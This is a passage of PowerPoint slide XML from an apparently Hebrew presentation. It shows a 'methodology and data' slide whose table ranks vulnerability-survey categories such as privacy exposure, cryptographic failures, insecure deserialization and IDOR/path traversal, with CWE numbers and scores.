        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>+DAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    שיטת עבודה ונתונים</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2730827109"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="495299" y="2859404"/>
          <a:ext cx="5867402" cy="1307551"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="338504">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4995497">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="533401">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" dirty="0" smtClean="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>דירוג</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="0" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" dirty="0" smtClean="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קטגוריות מסקר הפגיעויות</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="0" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" dirty="0" smtClean="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ציון</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="0" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חשיפת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מידע פרטי ("הפרת פרטיות") </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[CWE-359]</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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900" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>748</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כשלי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הצפנה </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[CWE-310/311/312/326/327]</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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900" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>584</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>פתיחה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לא מאובטחת של רצף סדרתי (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Serialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[CWE-502]</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>514</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>עקיפת מנגנון הענקת הרשאות באמצעות שימוש במפתחות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> בשליטת המשתמש </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(IDOR* &amp; Path Traversal)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[CWE-639]</a:t>
                      </a:r>
